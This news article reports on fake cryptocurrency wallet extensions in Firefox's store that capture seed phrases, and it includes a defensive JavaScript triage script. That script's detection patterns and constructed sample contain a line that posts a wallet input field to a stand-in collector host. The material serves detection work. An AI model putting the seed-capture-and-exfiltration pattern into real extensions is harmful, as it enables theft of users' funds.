More than 40 malicious extensions impersonating popular cryptocurrency wallets have been discovered in Mozilla Firefox’s official add-ons store, posing a significant risk to users’ digital assets.

Security researchers from Koi Security uncovered the scam campaign, which is actively targeting unsuspecting users by stealing wallet credentials and seed phrases.

The fake extensions mimic legitimate wallets from providers like MetaMask, Coinbase, Trust Wallet, Phantom, Exodus, OKX, Keplr, and MyMonero, using real brand logos and fake five-star reviews to build trust. Behind the scenes, the extensions include malicious code that detects sensitive input data—such as wallet seed phrases—and silently exfiltrates it to attacker-controlled servers.

According to Koi Security, the group behind the campaign is likely Russian-speaking and has cloned open-source versions of legitimate wallets, injecting code that filters user inputs exceeding 30 characters to capture mnemonic phrases. To avoid detection, error messages are made invisible by setting element opacity to zero.
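For anyone auditing an unpacked extension, the traits described above can be turned into a first-pass triage check. The following is an added example, not code from Koi Security or Mozilla; the regular expressions, the 20 to 60 character threshold range, the host names and the sample sources are all assumptions constructed for illustration.

```javascript
// Added example: heuristic triage of unpacked extension source files.
// Patterns, threshold range and host names below are assumptions for illustration.
const INPUT_LEN_CHECK = /\.value(?:\.trim\(\))?\.length\s*>=?\s*(\d+)/g;
const NETWORK_CALL = /\b(?:fetch\s*\(|XMLHttpRequest\b|sendBeacon\s*\(|new\s+WebSocket\s*\()/;
const ZERO_OPACITY = /opacity\s*[:=]\s*["']?0(?:\.0+)?["']?(?![\d.])/;
const URL_HOST = /https?:\/\/([a-z0-9.-]+)/gi;

function scanFile(name, source, allowedHosts) {
  const findings = [];
  for (const m of source.matchAll(INPUT_LEN_CHECK)) {
    const n = Number(m[1]);
    // The page reports a 30-character cut-off; accept nearby values too.
    if (n >= 20 && n <= 60) findings.push(`input-length filter (${n})`);
  }
  if (NETWORK_CALL.test(source)) findings.push("network call");
  if (ZERO_OPACITY.test(source)) findings.push("opacity set to 0");
  const unknownHosts = new Set();
  for (const m of source.matchAll(URL_HOST)) {
    const host = m[1].toLowerCase();
    const known = allowedHosts.some((a) => host === a || host.endsWith("." + a));
    if (!known) unknownHosts.add(host);
  }
  // Escalate only when a length filter, a network call and an unknown host co-occur.
  const suspicious = findings.some((f) => f.startsWith("input-length")) &&
    findings.includes("network call") && unknownHosts.size > 0;
  return { name, findings, unknownHosts: [...unknownHosts], suspicious };
}

function triage(files, allowedHosts) {
  return Object.entries(files)
    .map(([name, src]) => scanFile(name, src, allowedHosts))
    .filter((r) => r.suspicious);
}

// Constructed sample sources (not taken from any real extension).
const SAMPLES = {
  "popup.js": 'if (f.value.length > 30) fetch("https://collector.invalid/c", { method: "POST", body: f.value }); err.style.opacity = "0";',
  "ui.js": 'if (nick.value.length > 3) hint.style.opacity = "0.5"; fetch("https://api.wallet-vendor.example/prices");',
};

console.log(triage(SAMPLES, ["wallet-vendor.example"]));
```

A hit is a reason to read the file by hand, not a verdict: minified or obfuscated code will evade these patterns, and legitimate code can match any single one of them.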

The campaign has been active since at least April, with new entries appearing in the store as recently as last week. Although the findings were reported through Mozilla’s official tool, many of the malicious extensions reportedly remain online.

Mozilla has implemented an early detection system to flag suspicious crypto extensions using automated risk indicators, followed by human review. However, Koi Security’s findings suggest the system has failed to catch the full extent of this ongoing threat.



Users are advised to avoid installing crypto-related extensions from unofficial sources and to verify app legitimacy through wallet providers’ official websites. Installing malicious wallet extensions can lead to irreversible crypto theft that appears as legitimate user-initiated transactions.
